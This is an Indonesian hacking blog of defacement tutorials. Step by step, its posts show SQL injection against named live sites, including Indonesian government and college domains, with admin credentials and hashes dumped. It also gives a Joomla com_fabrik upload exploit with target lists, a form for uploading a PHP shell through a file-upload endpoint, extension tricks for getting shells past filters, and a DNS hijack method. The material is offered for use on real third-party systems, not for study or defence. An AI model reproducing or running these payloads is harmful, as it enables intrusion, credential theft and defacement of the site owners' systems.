SukabumiBlackHat

Tutorial Deface,Hacking,and All about IT

Showing posts with label Deface. Show all posts

TUTORIAL PASANG DIRSEARCH (PYTHON 3) DI WINDOWS

1 comment

assalamuaikum gais kembali lagi sama gua orang tertampan menurut ibuku di tutorial kali ini gua sharing tentang apa yang gua bisa kali ini mau bagi tutor cara pasang dirsearch di windows ahaha 

apa itu Dirsearch adalah tools bruteforce direktori 

langsung aja ke tutorial nya 

bahan-bahan :
*link bokep 
*koneksi
*windows
*face (ketampanan menentukan hasil)
*PYTHON versi 3 kalian bisa download di situs resmi nya TOUCH ME SENPAI
*DIRSEACRH nya donlod di Seneee  ===> INI BOS <===
download versi zip nya yaps


okeh yang hal pertama yang harus kalian lakukan adalah  install python dulu kalo <== skip aja cara install nya masa gak bisa  

kedua extraxt file dirsearch nya ke folder C:/dirsearch-master/
biar gampang ntar buka nya 

kita ke step ketiga yaitu buka cmd kalian windows + R ketik cmd lalu tekan enter


Nah seperti gambar liat di atas jika selesai akan terbuka cmd :v




nah sekarang kita masuk ke directory C:/dirsearch-master

caranya liat gambar di bawah !


Kalo selesai kita tinggal nambah kan command nya yaitu  dirsearch.py -u  targetlu.co.li -e php

nah  nah  -u adalah untuk url kalian yang mau di brutefroce directori nya dan -e adalah extension dir yang mau di gasss 





dan selesai done hahahaha :v 

kalo mau copas sertakan sumber ya bos nulis itu  butuh pikiran sama tenaga tangan buat ngetik

bantu share kalo share nya banyak w update lah blog ini tiap hari ahahahah :v 

kalo ada  kesulitan komen aja di bawah ntar di bantu solved ini nya 


malam dan selamat beraktifitas buat para night people 

Sqli DIOS (DUMP IN ONE SHOT)

No comments

Hallo whats up gais dah lama gx bikin tutor gue wkwokowk males anjir :v  karena ada mood gtau apa hari ini gua mau bikin tutorial lumyan menarik makanya gua bikin yooo simak gais 

tutor nya yaitu dios (DUMP IN ONE SHOT) tutor ini mungkin berguna bagi  para injektor :v
soalnya ni tutor kalo yang suka maenan sqli gak perlu muter muter manual jadi tinggal shoot aee

bahan :
-koneksi internet
-dork vuln sqli
 kalo  target sqli udah pada tau kan ciri ciri web yang vuln terhadap injeksi ? 
kalo gx tau simak dulu di sini 

kalian harus cari web vuln dan cari angka ajaib nya :v 
gua kasih live target ae dah :v http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=18
nah itu live target nya :'v
yang harus di lakukan ialan mencari jumlah kolom di web tersebut 
cara nya yaitu dengan order+by+  setelah di ketahui ternyata web tersebut error di number 9 
 nah sekarang yang kalian perlukan ialah mencari angka ajaib untuk melakukan DIOS tadi kita gunakan perintah union+select+ 

Nah bisa kalian lihat kan ternyata angka ajaib nya adalah 2 sekarang adalah langkah untuk melakukan DIOS nya caranya ? simak gan
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

nah itu adalah query untuk melakukan dios caranya gampang sangat kalian hanya perlu menambahkan query tersebut ke angka ajaib yang muncul jadi kek gini

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9+--+

Nah kek di atas kalian ngerti kan nanti akan muncul kaya gambar di bawah

kayak gitu sekarang kita tinggal melakukan perintah  group_concat

yang di kiri adalah column di kanan table
#CMIIW

jadi gini :

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,group_concat(user,0x3a,pas_enc),3,4,5,6,7,8,9+from+tbl_login+--+



Nah muncul user sama pass nya wkwkw tinggal cari admin login nya beibeh :v





cara jitu nge chat cewe :v

6 comments

okeh gais karna tadi ada req tutor dari salah satu member xaisyndicate dia pen tau cara jitu nge chat ceue :V

nah ituu dia tercyduk SS done wkowkowk langsung aja :v ke tutor ea gan 


pertama tama lu harus yakin bahwa lu bisa chat tuhh cewe walaupun hanya satu huruf :V
 kek gini gue bakal chat ceue secara randomm dengan satu huruf yaitu huruf y 



Masalah di bales ato gx ntuhh mah belakangan :v

eh ajig chatt tadi bales 

heheh kalo masalh cewe maah easyy kita masuk ke langkah berikut nya :v


langkah berikutnya ialah pakai 1000 akal akal an wkowkwokwok mungkin agak aneh sihh  kek gini nihh liat w :V


nah macem gituu :V setelah itu kalian bisa kalian variasikan jenis jenis modus nya :v kalo gue sihh gitu modus nya 

setelah kalian melewati beberapa sesi nanti kalian akan kebawa suasana dan chat an kalian akan terus berlanjut :v
kalo dah lama lebih baik gombalin sihyang belum tau cara gombal di sini cara gombal ala hacker

okey sekian dan terima gaji :v






tutorial sql challange print name,version,user,db dengan tables and coloumns dump in one shot (dios)

1 comment

Malemm gan lagi gx ada kerjaan nih yaudah bikin tutor aja :v lagian jenuh ajigg 10 hari libur sekolah mana sekarang males bikin tutor karna mood w lagi zeeb sangad w mau bikin tutor sql challange  mungkin udah gx asing lagi di telinga para injektor okay langsung aja ke tutorial 


Live  target nya kota gue sendiri :v yaitu   : http://sukabumikab.go.id/ :v

Nah yang kita perlukan ada lah mencari angka ajaib di sebuah web yang vuln sql injection :v 

dah taukan cara nya kalo gx tau baca di  sini nah di situ tutor nya :v

kebetulan gue dah dape angka ajaib nya yaitu di angka 3 liat gambar 


Keliatan kan :V setelah itu kita tambah kan perintah :v 

concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ','  ::  ','<font color=blue size=3>',column_name))),@))))

perintah di simpen di angka tiga tadi :V jadi kek gini

sukabumikab.go.id/ok/page.php?id=-5'+union+select+1,2,concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ','  ::  ','<font color=blue size=3>',column_name))),@)))),4,5,6,7+--+

nahh seperti ituu :v  nanti hasil nya kek di bawah :


Semoga harii kelen menyenangkan :v  











Deface Teknik com_fabrik

No comments

wkwkw malam semua gue mau post nih tentang tutorial deface com_fabrik mungkin udah gx asing buat para master master jadi buat para master  menjauh ae yaa soalnya ni tutor khusus nubi kek gue hehehe langsung aja 

kalian dorking di gugel dork nya 

option=com_fabrik site:.com
view=table&tableid site:.org

*site bisa kalian sesuiakan heheh

.jika kalian mendapatkan target nya kalian tambahkan exploit ini 

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

kalau vuln akan muncul seperti gambar di bawah 


yapp vuln nya adalah ada tempat upload :v

skrang lu upload script deface lu atau shell backdoor kesayangan lu 



Klik imvort CSV tunggu sebentar kalo muncul gambar kek di bawah ini berarti berhasil gan :v



sekarang kita liat akses nya di  www.site.com/media/namafile.html


ada beberapa live target gan nih :

http://www.wpnery.com/
https://www.unali.net
http://www.ghostshockey.it/
http://www.talani.co.za/

sekian dan terimakasih :v w mau tidur :v bsok di skolah masii ulangan :v bye bye






Deface teknik DNS Afraid

No comments

Haloo temen temen ^_^ dah lama nih gx post soalnya w males anjir :v males bikin tutorial :v
kali ini gue mau bagi tutorial deface dns afraid atau bisa di sebut dns avoid heheheh langsung aja cekidott 

1.lu harus daftar akun dulu di  http://freedns.afraid.org/ sama di https://www.000webhost.com

2.Kalo udah otw cpanel gan 


3.lu masuk directori /public_html dan upload index.php atau script deface lu :v


4.masuk Ke menu parked domain 


Setelah melakukan step step di atas sekarang kalian tinggal otw ke situs  http://freedns.afraid.org/

dan login 


Nah kalian ikutin kaya di gambar 


domain harusa "many many more available"

Klik "shared domain registed"


pilih domain apa aja

jan lupa juga buat type  isi NS 
dan destination isi dengan  ns01.000webhost.com or ns02.000webhost.com biasanya 
TTL : kosongin
wildcard centang 

Lalu klik save 

langsung Otw Ke 000webhost yang di menu parked domain 


Tinggal parked aja say good by :vwkowkow



Kenak kan wkowkokw

Thanks gan telah baca tutor nya :V













Deface sql injection manual

3 comments






Kembali lagi gais sama gue galehdotid :v gue belum sempet bikin tutor lagi karena banyak acara di sekolah gue :v

Tutorial kali ini adalah Deface teknik sql injeksion manual :v mungkin bisa di sebut cara curry user sama pasword  sebenarnya gue mau dari kmren bikin ini tutorial tapi males panjang kali ini karna gue udh beberapa hari gx nuliis di blog w bikin tutorail nya aja :v


langsung aja 

bahan-bahan

-browser
-usaha

saya akan menjelaskan nya perlahan lahan biar kelen yang baca paham :v


1.pertama-tama lu harus dorking di google dulu 

Dork nya :
inurl /school.php id=
inurl product.php id=
inurl galery.php id=


2.Tambahin target kalian dengan tanda kutip seperti di bawah ini 

http://www.maldacollege.ac.in/current-news.php?id=35'

Nah seperti contoh di atas kalo vuln  akan muncul gambar di bawah 




You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''147''' at line 1

3.Nah lang kah berikutnya adalah kita mencari error nya ada di nomor berapa kita coba dengan mengunakan perintah :v 
 order+by+
http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+1-- < tidak error
http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+2--  < tidak error
http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+3--  < tidak error
http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+4--  <tidak error
http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+5-- <error

Nah setelah di dump ternyata error di angka lima :v berarti jumlah database nya ada 4 

4.cara selanjut nya iyalah kita gunakan Perintah union+select  liat cara nya di bawah 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,2,3,4--

nah kita coba seperti itu :v ntar muncul angka kayak di gambar 



5.nah sekarang kita tambahkan perintah @@version atau version()  buat liat versi berapa sql nya 

karna gue muncul nya di angka dua brarti menambahkan @@version nya di angka dua jadi seperti ini :

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,@@version,3,4--


Karna yang muncul versi 5 berung sekali kelen karena kalo versi 4 susah jinx :v

6.Sekarang kita tambahkan perintah seperti di bawah nih 
Menambahkan perintah group_concat(table_name) di angka muncul tadi dan
perintah +from+information_schema.tables+where+table_schema=database()--
di akhir angka jadi macam nih 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--


Muncul table bnyak setelah itu kita pilih yang mau di dump yang mana dan di tahap ini kalian harus 
mengextrak kata yang mau di dum database nya ke hexadecimal 
misal nya gue di sini mau dump user_details setelah di extrake hexa decimal adalah 757365725f64657461696c73

nah seperti itu sekrang kita lanjut ke perintah nya adalah seperti di bawah ini 

group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin
from+information_schema.columns+where+table_name=0xhasil luextra tadi--
jangan lupa mengugunakan 0x << itu 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x757365725f64657461696c73--


Nah muncul table yang w dump tadi  sekrang kita pakai  lihat daleman nya cara nya adalah 
concat_ws(0x3a,name_db,name_db) <yang tadi group concat ganti  jadi concat_ws 

+from+nameyang tadi di dumb--  < yang di akhir angka jadi seperti itu

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--


muncul deh user sama pasword nya 

admin:3d7CypONoJmfmQ%3D%3D : 

sadmin:3d7CypONoJmfmQ%3D%3D : 


pasword nya tinggal kalian hash di hashkiller atau di tempat hash andalan lu 

dan lu tinggal cari admin login :v


gimana mudahkan :v


























Deface dengan array files[]

1 comment

Malem agan agan semua kembali lagi dengan gue :v

di postingan kali ini gue mau bagi bagi tutorial deface dengan Array files[]

langsung aja 


Dork :  inurl:/server/php/files  ext:jpg 
            *dork bisa di kembangkan
exploit: /server/php/

1.Lu dorking di gugel
2.kalo vuln kek di gambar 



3.masukin target lu ke CSRF 

<form method="POST" action="http://localhost/dir/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

save extensi html

4.buka csrf nya dan upload shell kalo sukses akan muncul 

{"files":[{"name":"novi.php","size":80665,"type":"application\/octet-stream","url":"https:\/\/localhost\/admin\/server\/php\/files\/novi.php","deleteUrl":"https:\/\/tripplegee.ng\/admin\/server\/php\/index.php?file=novi.php","deleteType":"DELETE"}]}




akses nya :  www.site.com/[path]/dir/server/php/files/namashel.php


happy deface 





Cara bypas extensi shell

No comments


Oke gais kali ini gue mau bagi  cara bypas shell backdoor :v
kalo kalian mentok kagak bisa di tamper data  solusi nya adalah bypass 

berikut adalah by pas nya :

indoxploit.jpeg
indoxploit.jpg
indoxploit.pdf
indoxploit.php
indoxploit.PhP.fla
indoxploit.PhP.jpeg
indoxploit.PhP.jpg
indoxploit.php.lnk
indoxploit.php.ndsxf
indoxploit.PhP.pdf
indoxploit.php.php5
indoxploit.php.phtml
indoxploit.php.pjpeg
indoxploit.php.pjpg
indoxploit.php.ppdf
indoxploit.PhP.txt
indoxploit.php.xxxjpg
indoxploit.php5
indoxploit.php;fla



nah itu adalah bypass yang saya gunakan karna kalo menggunakan bypas di atas server terkadang suka kebingungan buat nerima extensi extensi seperti di atas w juga tau dari bang al vri :v makasih bang udah ngajarin w